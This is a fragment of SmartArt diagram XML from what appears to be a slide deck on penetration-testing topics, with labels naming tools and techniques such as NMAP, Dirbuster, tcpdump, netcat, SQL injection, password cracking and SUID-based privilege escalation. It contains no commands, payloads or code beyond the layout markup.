    <dgm:pt modelId="{4CCB4225-02F4-4A7D-9B45-B23DE49547CA}" type="pres">
      <dgm:prSet presAssocID="{1782390C-690A-4EEA-B7C4-6D5C891A5D19}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{11693BAA-1C05-421F-A5C8-1A601A6DAE5C}" type="pres">
      <dgm:prSet presAssocID="{E17E2263-F438-4344-BD40-B5111BADF318}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A36B02A7-59A3-426F-B603-3920425DE26F}" type="pres">
      <dgm:prSet presAssocID="{E17E2263-F438-4344-BD40-B5111BADF318}" presName="bgRect" presStyleLbl="bgShp" presStyleIdx="1" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{5F68BEC1-687F-4E0E-8423-023D443004E3}" type="pres">
      <dgm:prSet presAssocID="{E17E2263-F438-4344-BD40-B5111BADF3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code"/>
        </a:ext>
      </dgm:extLst>
    </dgm:pt>
    <dgm:pt modelId="{B56414B9-D181-4419-A8D8-CCBAFA7D8141}" type="pres">
      <dgm:prSet presAssocID="{E17E2263-F438-4344-BD40-B5111BADF318}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3AC9ED47-20CB-488E-BA89-45D2E1A73A3D}" type="pres">
      <dgm:prSet presAssocID="{E17E2263-F438-4344-BD40-B5111BADF318}" presName="parTx" presStyleLbl="revTx" presStyleIdx="1" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{5D5FA34C-4851-4BAA-B34E-9C973884BE17}" type="pres">
      <dgm:prSet presAssocID="{6CDF4AF5-96BD-4A9A-B4FA-2B339C94E575}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{729DA5BB-873A-47C9-94EC-57A7D504DC85}" type="pres">
      <dgm:prSet presAssocID="{0D6E05D6-398A-47DF-B653-D5FB9980E9F3}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{32E16B08-EA1A-492A-8D2B-EF883433C33A}" type="pres">
      <dgm:prSet presAssocID="{0D6E05D6-398A-47DF-B653-D5FB9980E9F3}" presName="bgRect" presStyleLbl="bgShp" presStyleIdx="2" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A91B9F34-4F06-4110-8B62-E1B776076E82}" type="pres">
      <dgm:prSet presAssocID="{0D6E05D6-398A-47DF-B653-D5FB9980E9F3}"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evil face with solid fill"/>
        </a:ext>
      </dgm:extLst>
    </dgm:pt>
    <dgm:pt modelId="{07CF9391-F713-4210-A5B1-14AD6686BCEF}" type="pres">
      <dgm:prSet presAssocID="{0D6E05D6-398A-47DF-B653-D5FB9980E9F3}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{9098A641-5468-4E81-9B6C-E67EDD5023C1}" type="pres">
      <dgm:prSet presAssocID="{0D6E05D6-398A-47DF-B653-D5FB9980E9F3}" presName="parTx" presStyleLbl="revTx" presStyleIdx="2" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{CD2DE743-D55F-4A9B-9518-DE6FC686A85A}" type="pres">
      <dgm:prSet presAssocID="{6EEA2C49-A7CC-4181-90A7-CB06D83A47AA}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{CB7A6DBA-EB25-46F6-B10D-13230C3DA8BE}" type="pres">
      <dgm:prSet presAssocID="{72159D35-FF57-4E45-ACB4-AA6DEADA1563}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{4DA4D047-3135-46E0-98A5-ED174EA4B1C9}" type="pres">
      <dgm:prSet presAssocID="{72159D35-FF57-4E45-ACB4-AA6DEADA1563}" presName="bgRect" presStyleLbl="bgShp" presStyleIdx="3" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E093219D-C5EC-46BE-B695-8DA864C8CD42}" type="pres">
      <dgm:prSet presAssocID="{72159D35-FF57-4E45-ACB4-AA6DEADA15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siness Growth"/>
        </a:ext>
      </dgm:extLst>
    </dgm:pt>
    <dgm:pt modelId="{9F39AF59-CC58-46C1-B004-B5710D187848}" type="pres">
      <dgm:prSet presAssocID="{72159D35-FF57-4E45-ACB4-AA6DEADA1563}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3859A86C-DAB9-4843-AF9A-CFCAAD65D9E1}" type="pres">
      <dgm:prSet presAssocID="{72159D35-FF57-4E45-ACB4-AA6DEADA1563}" presName="parTx" presStyleLbl="revTx" presStyleIdx="3" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B2E4AA06-8C75-4033-9085-806BD3310D87}" type="pres">
      <dgm:prSet presAssocID="{14C0234E-3CA8-4927-86B8-BEF58A01B864}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{53262A56-F2BD-43A2-8DDD-A6AC31874232}" type="pres">
      <dgm:prSet presAssocID="{F5141ED3-8E99-40EB-9623-5CBAF7F45152}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{1726CD9B-E662-4378-A9B2-C6E525AF990F}" type="pres">
      <dgm:prSet presAssocID="{F5141ED3-8E99-40EB-9623-5CBAF7F45152}" presName="bgRect" presStyleLbl="bgShp" presStyleIdx="4" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{82464312-F93C-4C32-B8B0-B01AA79186B3}" type="pres">
      <dgm:prSet presAssocID="{F5141ED3-8E99-40EB-9623-5CBAF7F4515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 Sign"/>
        </a:ext>
      </dgm:extLst>
    </dgm:pt>
    <dgm:pt modelId="{B846F8FF-E9F8-4FB9-B590-C832A34092B3}" type="pres">
      <dgm:prSet presAssocID="{F5141ED3-8E99-40EB-9623-5CBAF7F45152}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C2CC89B4-6830-4A0A-A6EA-1A723B2B473D}" type="pres">
      <dgm:prSet presAssocID="{F5141ED3-8E99-40EB-9623-5CBAF7F45152}" presName="parTx" presStyleLbl="revTx" presStyleIdx="4" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{E199E815-F78B-446F-B118-C3C11BD05D84}" srcId="{CD3506AA-5689-4C9D-9A7F-70B535246B6D}" destId="{72159D35-FF57-4E45-ACB4-AA6DEADA1563}" srcOrd="3" destOrd="0" parTransId="{40365E31-220F-48C0-8880-E47FCADBA352}" sibTransId="{14C0234E-3CA8-4927-86B8-BEF58A01B864}"/>
    <dgm:cxn modelId="{6002312A-FA14-404F-B7BD-30F94955E9B5}" type="presOf" srcId="{CD3506AA-5689-4C9D-9A7F-70B535246B6D}" destId="{85756820-9E1C-4DAB-A04C-C72059E4170F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{5A668564-E6DE-4497-98D8-BD0A26693ADE}" srcId="{CD3506AA-5689-4C9D-9A7F-70B535246B6D}" destId="{F5141ED3-8E99-40EB-9623-5CBAF7F45152}" srcOrd="4" destOrd="0" parTransId="{51F4F7FE-9213-41D6-8C4C-A5BA35DCE866}" sibTransId="{F8487A0C-C894-481C-94E5-D04659FD306C}"/>
    <dgm:cxn modelId="{660E9092-DF7F-3B48-8BCB-B0F47E4A32F3}" type="presOf" srcId="{017F54DA-8C45-4223-B231-339957B36A2A}" destId="{D6B256F9-1A75-40CB-BCBE-8A9F26E2838C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{F68CB096-A6BD-D849-BB44-3102BD52CA5D}" type="presOf" srcId="{F5141ED3-8E99-40EB-9623-5CBAF7F45152}" destId="{C2CC89B4-6830-4A0A-A6EA-1A723B2B473D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{9E41589B-8E98-E74A-8E1E-7BBD817F6568}" type="presOf" srcId="{0D6E05D6-398A-47DF-B653-D5FB9980E9F3}" destId="{9098A641-5468-4E81-9B6C-E67EDD5023C1}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{890BDEBF-97A2-44F2-958A-5B9B671EC26F}" srcId="{CD3506AA-5689-4C9D-9A7F-70B535246B6D}" destId="{E17E2263-F438-4344-BD40-B5111BADF318}" srcOrd="1" destOrd="0" parTransId="{66526FCD-C377-4E89-926B-0921F4DE675A}" sibTransId="{6CDF4AF5-96BD-4A9A-B4FA-2B339C94E575}"/>
    <dgm:cxn modelId="{58AFCCC6-A51C-4B45-9AAA-99E76CB15013}" srcId="{CD3506AA-5689-4C9D-9A7F-70B535246B6D}" destId="{0D6E05D6-398A-47DF-B653-D5FB9980E9F3}" srcOrd="2" destOrd="0" parTransId="{E34FCC54-B2D4-46B6-A2E9-46D2F96049CC}" sibTransId="{6EEA2C49-A7CC-4181-90A7-CB06D83A47AA}"/>
    <dgm:cxn modelId="{B5EF9DE9-59FE-5846-8D93-B0510B3FF7C4}" type="presOf" srcId="{72159D35-FF57-4E45-ACB4-AA6DEADA1563}" destId="{3859A86C-DAB9-4843-AF9A-CFCAAD65D9E1}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{84406DFC-50FF-4F4F-A773-427DFC387A30}" srcId="{CD3506AA-5689-4C9D-9A7F-70B535246B6D}" destId="{017F54DA-8C45-4223-B231-339957B36A2A}" srcOrd="0" destOrd="0" parTransId="{387C6D98-AD22-45C7-BEEB-9A04A44E216F}" sibTransId="{1782390C-690A-4EEA-B7C4-6D5C891A5D19}"/>
    <dgm:cxn modelId="{7162BAFC-FFA9-3C43-BDE0-025AA1665112}" type="presOf" srcId="{E17E2263-F438-4344-BD40-B5111BADF318}" destId="{3AC9ED47-20CB-488E-BA89-45D2E1A73A3D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{AB517B32-4DF4-C447-A2B9-21C616739D22}" type="presParOf" srcId="{85756820-9E1C-4DAB-A04C-C72059E4170F}" destId="{2592946B-61BA-46ED-881D-9DA483A16A44}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{F15C1677-3C61-7C4C-B874-86263976103B}" type="presParOf" srcId="{2592946B-61BA-46ED-881D-9DA483A16A44}" destId="{8DD4F3DC-D491-4459-8D5C-A055C70E6E87}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{FECC4AB4-9407-794C-85EA-F67A7C1668B1}" type="presParOf" srcId="{2592946B-61BA-46ED-881D-9DA483A16A44}" destId="{B5676437-86DB-485F-9635-BD51C998B2E6}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{AB55C33A-D2A2-7F42-A3AA-ED3C07F0D21D}" type="presParOf" srcId="{2592946B-61BA-46ED-881D-9DA483A16A44}" destId="{4185D61E-F9A5-46BE-A5F7-25AB46FA98AD}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{17866F72-0549-0A46-955E-0DFC10CF1A8B}" type="presParOf" srcId="{2592946B-61BA-46ED-881D-9DA483A16A44}" destId="{D6B256F9-1A75-40CB-BCBE-8A9F26E2838C}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{015DDAE8-6A4D-CE44-BAB4-3EDFE46FFAB1}" type="presParOf" srcId="{85756820-9E1C-4DAB-A04C-C72059E4170F}" destId="{4CCB4225-02F4-4A7D-9B45-B23DE49547CA}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{BBDDF357-9CA8-0948-9D61-43DEBA35D4CA}" type="presParOf" srcId="{85756820-9E1C-4DAB-A04C-C72059E4170F}" destId="{11693BAA-1C05-421F-A5C8-1A601A6DAE5C}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{0EFA4E16-65A5-8E4C-9863-202311DF2DBC}" type="presParOf" srcId="{11693BAA-1C05-421F-A5C8-1A601A6DAE5C}" destId="{A36B02A7-59A3-426F-B603-3920425DE26F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{7B4AC9E3-3F04-A746-8F03-9C9AECF69BCD}" type="presParOf" srcId="{11693BAA-1C05-421F-A5C8-1A601A6DAE5C}" destId="{5F68BEC1-687F-4E0E-8423-023D443004E3}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{495C1ECF-CBCF-5E43-948D-19226AB1E4A5}" type="presParOf" srcId="{11693BAA-1C05-421F-A5C8-1A601A6DAE5C}" destId="{B56414B9-D181-4419-A8D8-CCBAFA7D8141}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{CF09F298-3EA8-2543-86C7-174489DE771C}" type="presParOf" srcId="{11693BAA-1C05-421F-A5C8-1A601A6DAE5C}" destId="{3AC9ED47-20CB-488E-BA89-45D2E1A73A3D}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{98CFBB8A-ED2E-A04F-B15E-F1C693C3B731}" type="presParOf" srcId="{85756820-9E1C-4DAB-A04C-C72059E4170F}" destId="{5D5FA34C-4851-4BAA-B34E-9C973884BE17}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{C20DE855-0AE2-2143-8511-19E73A4FC519}" type="presParOf" srcId="{85756820-9E1C-4DAB-A04C-C72059E4170F}" destId="{729DA5BB-873A-47C9-94EC-57A7D504DC85}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{54C6C7CC-18DC-B643-A907-83344291D716}" type="presParOf" srcId="{729DA5BB-873A-47C9-94EC-57A7D504DC85}" destId="{32E16B08-EA1A-492A-8D2B-EF883433C33A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{3681FBD6-ACA7-7342-954B-4D04304056C3}" type="presParOf" srcId="{729DA5BB-873A-47C9-94EC-57A7D504DC85}" destId="{A91B9F34-4F06-4110-8B62-E1B776076E82}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{2B40CEA7-77C4-2048-8040-4D0EF47590FB}" type="presParOf" srcId="{729DA5BB-873A-47C9-94EC-57A7D504DC85}" destId="{07CF9391-F713-4210-A5B1-14AD6686BCEF}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{677FB914-337C-8B4D-92C0-F2DA86EDE2A9}" type="presParOf" srcId="{729DA5BB-873A-47C9-94EC-57A7D504DC85}" destId="{9098A641-5468-4E81-9B6C-E67EDD5023C1}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{D7E18B81-9C85-D34E-BB08-80F5BFE22D4B}" type="presParOf" srcId="{85756820-9E1C-4DAB-A04C-C72059E4170F}" destId="{CD2DE743-D55F-4A9B-9518-DE6FC686A85A}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{66DCED86-3DA8-E145-B484-4AA7CB547F11}" type="presParOf" srcId="{85756820-9E1C-4DAB-A04C-C72059E4170F}" destId="{CB7A6DBA-EB25-46F6-B10D-13230C3DA8BE}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{E78295CD-8B55-0044-92C2-28C37181996A}" type="presParOf" srcId="{CB7A6DBA-EB25-46F6-B10D-13230C3DA8BE}" destId="{4DA4D047-3135-46E0-98A5-ED174EA4B1C9}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{0076BBC1-2B0D-5B4E-BB03-C23090CF72FF}" type="presParOf" srcId="{CB7A6DBA-EB25-46F6-B10D-13230C3DA8BE}" destId="{E093219D-C5EC-46BE-B695-8DA864C8CD42}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{8A6B409B-509D-714A-B793-3941559E387B}" type="presParOf" srcId="{CB7A6DBA-EB25-46F6-B10D-13230C3DA8BE}" destId="{9F39AF59-CC58-46C1-B004-B5710D187848}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{6FB90FFC-4280-0846-8862-462B6A9B435D}" type="presParOf" srcId="{CB7A6DBA-EB25-46F6-B10D-13230C3DA8BE}" destId="{3859A86C-DAB9-4843-AF9A-CFCAAD65D9E1}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{2D0661B9-2AB1-2C47-B95D-EAD40DFB7270}" type="presParOf" srcId="{85756820-9E1C-4DAB-A04C-C72059E4170F}" destId="{B2E4AA06-8C75-4033-9085-806BD3310D87}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{D4952423-9811-E04D-930C-E2E792CD3517}" type="presParOf" srcId="{85756820-9E1C-4DAB-A04C-C72059E4170F}" destId="{53262A56-F2BD-43A2-8DDD-A6AC31874232}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{D5E956DC-9407-3B49-8A98-D0B61147F0D8}" type="presParOf" srcId="{53262A56-F2BD-43A2-8DDD-A6AC31874232}" destId="{1726CD9B-E662-4378-A9B2-C6E525AF990F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{D30C39E1-93AB-0444-9134-B374449DF8A5}" type="presParOf" srcId="{53262A56-F2BD-43A2-8DDD-A6AC31874232}" destId="{82464312-F93C-4C32-B8B0-B01AA79186B3}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{0B71C586-7F36-DF4F-88C6-916F4C31CBDA}" type="presParOf" srcId="{53262A56-F2BD-43A2-8DDD-A6AC31874232}" destId="{B846F8FF-E9F8-4FB9-B590-C832A34092B3}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{5F410BF8-5798-3145-9F45-6E096960AB63}" type="presParOf" srcId="{53262A56-F2BD-43A2-8DDD-A6AC31874232}" destId="{C2CC89B4-6830-4A0A-A6EA-1A723B2B47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a:solidFill>
          <a:schemeClr val="accent1">
            <a:lumMod val="50000"/>
          </a:schemeClr>
        </a:solidFill>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a:solidFill>
          <a:schemeClr val="accent1">
            <a:lumMod val="50000"/>
          </a:schemeClr>
        </a:solidFill>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a:solidFill>
          <a:schemeClr val="accent1">
            <a:lumMod val="50000"/>
          </a:schemeClr>
        </a:solidFill>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a:solidFill>
          <a:schemeClr val="accent1">
            <a:lumMod val="50000"/>
          </a:schemeClr>
        </a:solidFill>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a:solidFill>
          <a:schemeClr val="accent1">
            <a:lumMod val="50000"/>
          </a:schemeClr>
        </a:solidFill>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NMAP</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err="1"/>
            <a:t>Dirbuster</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>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err="1"/>
            <a:t>tcpdump</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>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code"/>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pen folde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nvelop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a:solidFill>
          <a:schemeClr val="accent1">
            <a:lumMod val="50000"/>
          </a:schemeClr>
        </a:solidFill>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a:solidFill>
          <a:schemeClr val="accent1">
            <a:lumMod val="50000"/>
          </a:schemeClr>
        </a:solidFill>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SUDOER</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a:t>SUID bit</a:t>
          </a:r>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Path Jacking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a:solidFill>
          <a:schemeClr val="accent1">
            <a:lumMod val="50000"/>
          </a:schemeClr>
        </a:solidFill>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k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NMAP</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err="1"/>
            <a:t>Dirbuster</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>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err="1"/>
            <a:t>tcpdump</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>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a:solidFill>
          <a:schemeClr val="accent1">
            <a:lumMod val="50000"/>
          </a:schemeClr>
        </a:solidFill>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code"/>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pen folde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nvelop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NMAP</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err="1"/>
            <a:t>Dirbuster</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>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err="1"/>
            <a:t>tcpdump</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>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code"/>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a:solidFill>
          <a:schemeClr val="accent1">
            <a:lumMod val="50000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
    </dgm:pt>
    <dgm:pt modelId="{79AAB5C7-6CAE-4443-89B6-D910B6DC4985}" type="pres">
      <dgm:prSet presAssocID="{050186DE-B2B6-4253-B085-378747021C6C}"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pen folde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nvelop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a:t>NMAP</a:t>
          </a:r>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err="1"/>
            <a:t>Dirbuster</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>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err="1"/>
            <a:t>tcpdump</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>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code"/>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pen folder"/>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a:solidFill>
          <a:schemeClr val="accent1">
            <a:lumMod val="50000"/>
          </a:schemeClr>
        </a:solidFill>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nvelope"/>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46DC9E-F0B1-4FD5-9BEB-839B15AE5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05245D-10F9-446B-A74A-CF009E489932}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr>
            <a:lnSpc>
              <a:spcPct val="100000"/>
            </a:lnSpc>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" err="1"/>
            <a:t>netcat</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BBE21A5A-DFDB-4513-9BF6-47702D54D48A}" type="parTrans" cxnId="{F56412C4-00EE-4D42-BE6C-DE4BADE305D6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{25A890C4-879D-4EA3-BA01-D15CC35F48B4}" type="sibTrans" cxnId="{F56412C4-00EE-4D42-BE6C-DE4BADE305D6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{050186DE-B2B6-4253-B085-378747021C6C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr>
            <a:lnSpc>
              <a:spcPct val="100000"/>
            </a:lnSpc>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" dirty="0" err="1"/>
            <a:t>SQLi</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{06ACACC7-C0B8-4D3D-B2BA-5E9ADB163E0C}" type="parTrans" cxnId="{6AFB20B5-3728-4274-BB90-6BB92BA3968F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{191C9073-8A7E-4D75-9096-355366FA18FD}" type="sibTrans" cxnId="{6AFB20B5-3728-4274-BB90-6BB92BA3968F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FB7B922F-4683-D94C-83ED-77B5DFA83FD6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr>
            <a:lnSpc>
              <a:spcPct val="100000"/>
            </a:lnSpc>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Password Cracking</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B844D8E5-5D65-6047-8678-34BAA0E9A5AA}" type="parTrans" cxnId="{C2A41370-A85F-3E48-82E5-39A75B0192B5}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CDB31850-999C-1948-8A10-9821998BC47F}" type="sibTrans" cxnId="{C2A41370-A85F-3E48-82E5-39A75B0192B5}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E6DDF0C4-605D-416C-B4A1-D1B4631097A8}" type="pres">
      <dgm:prSet presAssocID="{5146DC9E-F0B1-4FD5-9BEB-839B15AE5A98}" presName="root" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B7100F68-374B-40F4-96DF-DA5466297961}" type="pres">
      <dgm:prSet presAssocID="{BA05245D-10F9-446B-A74A-CF009E489932}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{35CE4538-930C-4B90-853C-9DE8966AF518}" type="pres">
      <dgm:prSet presAssocID="{BA05245D-10F9-446B-A74A-CF009E489932}" presName="bgRect" presStyleLbl="bgShp" presStyleIdx="0" presStyleCnt="3" custLinFactNeighborX="5048" custLinFactNeighborY="-42"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="accent1">
            <a:lumMod val="50000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
    </dgm:pt>
    <dgm:pt modelId="{4846B682-492F-4273-A279-1BC785500E9C}" type="pres">
      <dgm:prSet presAssocID="{BA05245D-10F9-446B-A74A-CF009E48993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t"/>
        </a:ext>
      </dgm:extLst>
    </dgm:pt>
    <dgm:pt modelId="{30FEDD72-0E01-4E0B-90F0-49D5001DE857}" type="pres">
      <dgm:prSet presAssocID="{BA05245D-10F9-446B-A74A-CF009E489932}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{EDAC498E-686D-459A-BF14-9E6D4B4C2473}" type="pres">
      <dgm:prSet presAssocID="{BA05245D-10F9-446B-A74A-CF009E489932}" presName="parTx" presStyleLbl="revTx" presStyleIdx="0" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
